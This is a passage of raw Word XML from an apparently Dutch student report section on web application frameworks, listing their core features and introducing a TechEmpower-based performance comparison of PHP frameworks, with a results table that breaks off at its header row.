      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc491022076"/>
      <w:r>
        <w:t xml:space="preserve">3.5.1 </w:t>
      </w:r>
      <w:r w:rsidR="0070741F" w:rsidRPr="00486596">
        <w:t>Web Application Framework</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="4D52BF6C" w14:textId="373965F7" w:rsidR="004D7220" w:rsidRDefault="004E7040" w:rsidP="0095687C">
      <w:r>
        <w:t xml:space="preserve">Een </w:t>
      </w:r>
      <w:r w:rsidR="0039345A">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ontwikkelen met </w:t>
      </w:r>
      <w:r w:rsidR="005D4FCE">
        <w:t xml:space="preserve">enkel een </w:t>
      </w:r>
      <w:r w:rsidR="0039345A">
        <w:t>programmeertaal</w:t>
      </w:r>
      <w:r w:rsidR="005D4FCE">
        <w:t xml:space="preserve"> (e.g. </w:t>
      </w:r>
      <w:r w:rsidR="0039345A">
        <w:t>PHP, Java, Python</w:t>
      </w:r>
      <w:r w:rsidR="005D4FCE">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0039345A">
        <w:t xml:space="preserve"> kan een lastige klus zijn waarin veel tijd en als het voor een klant is, geld ingestoken wordt. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0039345A">
        <w:t>Frameworks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0039345A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B3B04">
        <w:t xml:space="preserve">zijn net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005B3B04">
        <w:t>jetpacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005B3B04">
        <w:t xml:space="preserve"> voor een programmeertaal</w:t>
      </w:r>
      <w:r w:rsidR="00C13D03">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C13D03">
        <w:t>Upwork</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C13D03">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E4111D">
        <w:t>2017</w:t>
      </w:r>
      <w:r w:rsidR="00C13D03">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0045329F">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00E4111D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C2D2B">
        <w:t xml:space="preserve">zij versnellen en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007C2D2B">
        <w:t>vermakkelijken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007C2D2B">
        <w:t xml:space="preserve"> het ontwikkelproces. Dat doen de web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007C2D2B">
        <w:t>frameworks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007C2D2B">
        <w:t xml:space="preserve"> met</w:t>
      </w:r>
      <w:r w:rsidR="0045329F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C2D2B">
        <w:t xml:space="preserve">behulp van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00ED1519">
        <w:t>webservices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C14752">
        <w:t xml:space="preserve"> (e.g. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C14752">
        <w:t>depandacy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C14752">
        <w:t xml:space="preserve"> managers)</w:t>
      </w:r>
      <w:r w:rsidR="0045329F">
        <w:t>, web resources</w:t>
      </w:r>
      <w:r w:rsidR="00C14752">
        <w:t xml:space="preserve"> (e.g. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C14752">
        <w:t>config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C14752">
        <w:t xml:space="preserve"> files)</w:t>
      </w:r>
      <w:r w:rsidR="0045329F">
        <w:t xml:space="preserve">, en web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0045329F">
        <w:t>APIs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C14752">
        <w:t xml:space="preserve"> (e.g.</w:t>
      </w:r>
      <w:r w:rsidR="005F0188">
        <w:t xml:space="preserve"> ORM)</w:t>
      </w:r>
      <w:r w:rsidR="007C2D2B">
        <w:t xml:space="preserve"> die zij out-of-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007C2D2B">
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007C2D2B">
        <w:t>-box aanbieden</w:t>
      </w:r>
      <w:r w:rsidR="005B3B04">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FC2C7C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E3D67">
        <w:t xml:space="preserve">Het is net als het bouwen van een schip, alle bouwcomponenten worden </w:t>
      </w:r>
      <w:r w:rsidR="0025483A">
        <w:t xml:space="preserve">voorgemaakt aangeleverd zodat het </w:t>
      </w:r>
      <w:r w:rsidR="007E70BB">
        <w:t>bouwproces</w:t>
      </w:r>
      <w:r w:rsidR="0025483A">
        <w:t xml:space="preserve"> versnelt kan worden.</w:t>
      </w:r>
      <w:r w:rsidR="00E76A61">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16567877" w14:textId="78ECF7B0" w:rsidR="00253E27" w:rsidRDefault="004D7220" w:rsidP="0095687C">
      <w:r>
        <w:t xml:space="preserve">De </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Core</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> features van </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>Webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Frameworks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zijn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092D1594" w14:textId="4E0E9031" w:rsidR="007C5696" w:rsidRDefault="00424B16" w:rsidP="0095687C">
      <w:r>
        <w:t>Libraries</w:t>
      </w:r>
      <w:r w:rsidR="002A2A24">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00373A00">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="002A2A24">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00373A00">
        <w:t xml:space="preserve">Herbruikbare, voorgeprogrammeerde code dat softwareontwikkelaar gebruiken als bouwblokken voor het ontwikkelen van softwareapplicaties. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F35D58" w14:textId="68FF652E" w:rsidR="00424B16" w:rsidRDefault="00424B16" w:rsidP="0095687C">
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidR="00373A00">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00456C0D">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00373A00">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00456C0D">
        <w:t xml:space="preserve">Application </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00990FD6">
        <w:t>Programmer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00990FD6">
        <w:t xml:space="preserve"> Interface, </w:t>
      </w:r>
      <w:r w:rsidR="00200D7C">
        <w:t>zijn kleine programma’s die de software ondersteunen in het uitvoeren van functionaliteiten.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49776C91" w14:textId="400BC8E8" w:rsidR="00424B16" w:rsidRDefault="004478BE" w:rsidP="0095687C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cashing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00200D7C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0043798B">
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="009407A4">
        <w:t>Het opslaan van web resources in het</w:t>
      </w:r>
      <w:r w:rsidR="00744A63">
        <w:t xml:space="preserve"> tijdelijke geheugen dit</w:t>
      </w:r>
      <w:r w:rsidR="009407A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00744A63">
        <w:t>verlaagt de</w:t>
      </w:r>
      <w:r w:rsidR="009407A4">
        <w:t xml:space="preserve"> server </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009407A4">
        <w:t>workload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009407A4">
        <w:t xml:space="preserve"> en gebruik van brandbreedte</w:t>
      </w:r>
      <w:r w:rsidR="00427D1E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DBB260" w14:textId="4948C4E2" w:rsidR="00722DCB" w:rsidRDefault="00722DCB" w:rsidP="0095687C">
      <w:r>
        <w:t xml:space="preserve">URL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mapping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00583A35">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00583A35">
        <w:t>Een systeem</w:t>
      </w:r>
      <w:r w:rsidR="009622A4">
        <w:t xml:space="preserve"> waarmee je URL’s</w:t>
      </w:r>
      <w:r w:rsidR="00583A35">
        <w:t xml:space="preserve"> kunt </w:t>
      </w:r>
      <w:r w:rsidR="009622A4">
        <w:t>koppelen aan zelf gemaakte URL’s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DDA16A" w14:textId="48D08DCE" w:rsidR="00F501FD" w:rsidRPr="00A54AEF" w:rsidRDefault="004478BE" w:rsidP="0095687C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r w:rsidR="00427D1E" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E646E" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00427D1E" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C35F46" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="000E646E" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ub Framework</w:t>
      </w:r>
      <w:r w:rsidR="00E52070" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E52070" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>voor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E52070" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E52070" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>authenticatie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E52070" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E52070" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E52070" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A0D27" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>autorisatie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="79812E78" w14:textId="1FCEEC3F" w:rsidR="008E59DF" w:rsidRPr="00486596" w:rsidRDefault="0013154F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00486596">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP </w:t>
      </w:r>
      <w:r w:rsidR="00D26791" w:rsidRPr="00486596">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Framework Benchmark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED1CB3D" w14:textId="22A25B88" w:rsidR="00C54EE6" w:rsidRDefault="00B123E5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Techempower</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> brengt eerder jaar een benchmark uit voor Web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Frameworks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003C7481">
        <w:t xml:space="preserve">. Zij testen de Web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003C7481">
        <w:t>Frameworks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003C7481">
        <w:t xml:space="preserve"> op een aantal types JSON </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003C7481">
        <w:t>serialisatie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003C7481">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B16E6F">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="0096171C">
        <w:t>nkele query</w:t>
      </w:r>
      <w:r w:rsidR="005B66B9">
        <w:t>, data updates</w:t>
      </w:r>
      <w:r w:rsidR="008053B9">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000F2F4F">
        <w:t xml:space="preserve">Ik zal de PHP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000F2F4F">
        <w:t>Frameworks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000F2F4F">
        <w:t xml:space="preserve"> met elkaar vergelijken op performance.</w:t>
      </w:r>
      <w:r w:rsidR="00142968">
        <w:t xml:space="preserve"> Uit het resultaat zal ik nog niet concluderen voor welke Web Framework ik ga kiezen. Hiervoor zal ik ook kijken naar de features en schaalbaarheid die de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00142968">
        <w:t>Frameworks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00142968">
        <w:t xml:space="preserve"> bieden. PHP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00142968">
        <w:t>Frameworks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00142968">
        <w:t xml:space="preserve"> zijn over het algemeen </w:t>
      </w:r>
      <w:r w:rsidR="002032CA">
        <w:t>traag en zullen niet veel ve</w:t>
      </w:r>
      <w:r w:rsidR="00C54EE6">
        <w:t>rschillen in snelheid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3F559D" w14:textId="77777777" w:rsidR="008F6B07" w:rsidRPr="00486596" w:rsidRDefault="008F6B07">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00486596">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">PHP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00486596">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Frameworks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="476764A7" w14:textId="648D42F7" w:rsidR="00486596" w:rsidRDefault="003B0953" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Phalcon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A4EF7F1" w14:textId="628A95D7" w:rsidR="00486596" w:rsidRDefault="00486596" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Slim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6936ED45" w14:textId="77777777" w:rsidR="00486596" w:rsidRDefault="00486596" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>YII2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DD7D45" w14:textId="77777777" w:rsidR="00486596" w:rsidRDefault="00486596" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63C74F2A" w14:textId="221BE7E7" w:rsidR="00486596" w:rsidRDefault="00486596" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Symfony</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E707BA">
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711B41C9" w14:textId="77777777" w:rsidR="00E915E4" w:rsidRDefault="00486596" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Zend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEC69A9" w14:textId="7F6A668D" w:rsidR="00A77292" w:rsidRDefault="003E5093" w:rsidP="00A5093B">
      <w:r>
        <w:t xml:space="preserve">In tabel 3.7.1 zal ik </w:t>
      </w:r>
      <w:r w:rsidR="00A77292">
        <w:t>de benchmarks van techempower.com tonen om de keuze die ik heb gemaakt te onderbouwe</w:t>
      </w:r>
      <w:r w:rsidR="0047231A">
        <w:t xml:space="preserve">n. De PHP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0047231A">
        <w:t>Frameworks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0047231A">
        <w:t xml:space="preserve"> worden op 3</w:t>
      </w:r>
      <w:r w:rsidR="00A77292">
        <w:t xml:space="preserve"> test types getest: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352886CB" w14:textId="1C97C97F" w:rsidR="00DB3214" w:rsidRDefault="00A77292" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JSON </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>serialisatie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EB114C">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00DB3214">
        <w:t xml:space="preserve"> In deze test is elke response een JSON </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB3214">
        <w:t>serialisatie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB3214">
        <w:t xml:space="preserve"> van een geïnstantieerd object dat de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB3214">
        <w:t>key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB3214">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB3214">
        <w:t>value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB3214">
        <w:t xml:space="preserve"> koppelt aan de waarde </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB3214">
        <w:t>Hello</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB3214">
        <w:t>, World! {“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB3214">
        <w:t>message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB3214">
        <w:t>”:”</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB3214">
        <w:t>Hello</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB3214">
        <w:t>, World!”}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA8DAC3" w14:textId="42B17D29" w:rsidR="00A77292" w:rsidRDefault="00A77292" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Enkele query</w:t>
      </w:r>
      <w:r w:rsidR="00EB114C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C24083">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00EB114C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C24083">
        <w:t xml:space="preserve">In deze test wordt elke </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C24083">
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C24083">
        <w:t xml:space="preserve"> verwerkt door het ophalen van een enkele regel uit een simpele database. {“id”:3217,”randomNumber”:2149}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1652F0" w14:textId="20E99A97" w:rsidR="00AF0FB2" w:rsidRDefault="00A77292" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Data updates</w:t>
      </w:r>
      <w:r w:rsidR="008357C6">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAAA887" w14:textId="77777777" w:rsidR="0047231A" w:rsidRDefault="0047231A" w:rsidP="0047231A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9638" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3020"/>
        <w:gridCol w:w="3500"/>
        <w:gridCol w:w="3118"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D8697D" w:rsidRPr="00422628" w14:paraId="5557A507" w14:textId="77777777" w:rsidTr="003E72A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="4936C606" w14:textId="27C979BF" w:rsidR="00D8697D" w:rsidRPr="00A54AEF" w:rsidRDefault="00D8697D">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A54AEF">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>PHP Framework Benchmark</w:t>
            </w:r>
            <w:r w:rsidR="005F32CD" w:rsidRPr="00A54AEF">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="005F32CD" w:rsidRPr="00A54AEF">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Gesorteerd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="005F32CD" w:rsidRPr="00A54AEF">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> op Performance)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE3B92" w14:paraId="33A86F80" w14:textId="77777777" w:rsidTr="003E72A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="1F30F15E" w14:textId="096F2008" w:rsidR="00FE3B92" w:rsidRDefault="00FE3B92">
            <w:r>
              <w:t xml:space="preserve">JSON </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>serialisatie</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E72A9" w14:paraId="4434B5D4" w14:textId="77777777" w:rsidTr="003E72A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FCA5EDC" w14:textId="16F5D33C" w:rsidR="007D753D" w:rsidRDefault="00990F9C">
            <w:r>
              <w:t>Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71A60432" w14:textId="1D3426B3" w:rsidR="007D753D" w:rsidRDefault="00990F9C">
            <w:r>
              <w:t>Performance</w:t>
            </w:r>
            <w:r w:rsidR="003E72A9">
              <w:t xml:space="preserve"> (hoe hoger hoe beter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08FBF00C" w14:textId="50A57D9C" w:rsidR="007D753D" w:rsidRDefault="00D453C6">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Wachtijd</w:t>
            </w:r>
